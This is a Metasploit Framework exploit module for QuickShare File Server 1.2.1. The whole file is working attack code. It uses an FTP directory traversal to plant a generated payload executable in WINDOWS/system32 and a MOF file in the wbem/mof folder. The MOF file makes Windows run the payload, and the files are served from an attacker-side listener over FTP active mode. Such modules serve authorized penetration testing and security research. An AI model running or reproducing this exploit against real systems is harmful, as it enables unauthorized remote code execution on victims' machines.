metasploit-framework/modules/exploits/windows/ftp/quickshare_traversal_write.rb

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##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "QuickShare File Server 1.2.1 Directory Traversal Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in QuickShare File Server's FTP
service. By supplying "../" in the file path, it is possible to trigger a
directory traversal flaw, allowing the attacker to read a file outside the
virtual directory. By default, the "Writable" option is enabled during account
creation, therefore this makes it possible to create a file at an arbitrary
location, which leads to remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '70776'],
['EDB', '16105'],
['URL', 'http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html'],
['URL', 'http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
['QuickShare File Server 1.2.1', {}]
],
'Privileged' => false,
'DisclosureDate' => "Feb 03 2011",
'DefaultTarget' => 0))
register_options(
[
# Change the default description so this option makes sense
OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
], self.class)
end
def check
connect
disconnect
if banner =~ /quickshare ftpd/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def on_client_connect(cli)
peer = "#{cli.peerhost}:#{cli.peerport}"
case @stage
when :exe
print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
cli.put(@exe)
@stage = :mof
when :mof
print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")
cli.put(@mof)
end
cli.close
end
def upload(filename)
select(nil, nil, nil, 1)
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Trying to upload #{::File.basename(filename)}")
# We can't use connect_login, because it cannot determine a successful login correctly.
# For example: The server actually returns a 503 (Bad Sequence of Commands) when the
# user has already authenticated.
conn = connect(false, datastore['VERBOSE'])
res = send_user(datastore['FTPUSER'], conn)
if res !~ /^(331|2)/
vprint_error("#{peer} - The server rejected our username: #{res.to_s}")
return false
end
res = send_pass(datastore['FTPPASS'], conn)
if res !~ /^(2|503)/
vprint_error("#{peer} - The server rejected our password: #{res.to_s}")
return false
end
# Switch to binary mode
print_status("#{peer} - Set binary mode")
send_cmd(['TYPE', 'I'], true, conn)
# Prepare active mode: Get attacker's IP and source port
src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
src_port = datastore['SRVPORT'].to_i
# Prepare active mode: Convert the IP and port for active mode
src_ip = src_ip.gsub(/\./, ',')
src_port = "#{src_port/256},#{src_port.remainder(256)}"
# Set to active mode
print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
# Tell the FTP server to download our file
send_cmd(['STOR', filename], false, conn)
disconnect(conn)
end
def exploit
trigger = '../../../../../../../../'
exe_name = "#{trigger}WINDOWS/system32/#{rand_text_alpha(rand(10)+5)}.exe"
mof_name = "#{trigger}WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.vbs"
@mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
@exe = generate_payload_exe
@stage = :exe
begin
t = framework.threads.spawn("reqs", false) {
# Upload our malicious executable
u = upload(exe_name)
# Upload the mof file
upload(mof_name) if u
}
super
ensure
t.kill
end
end
end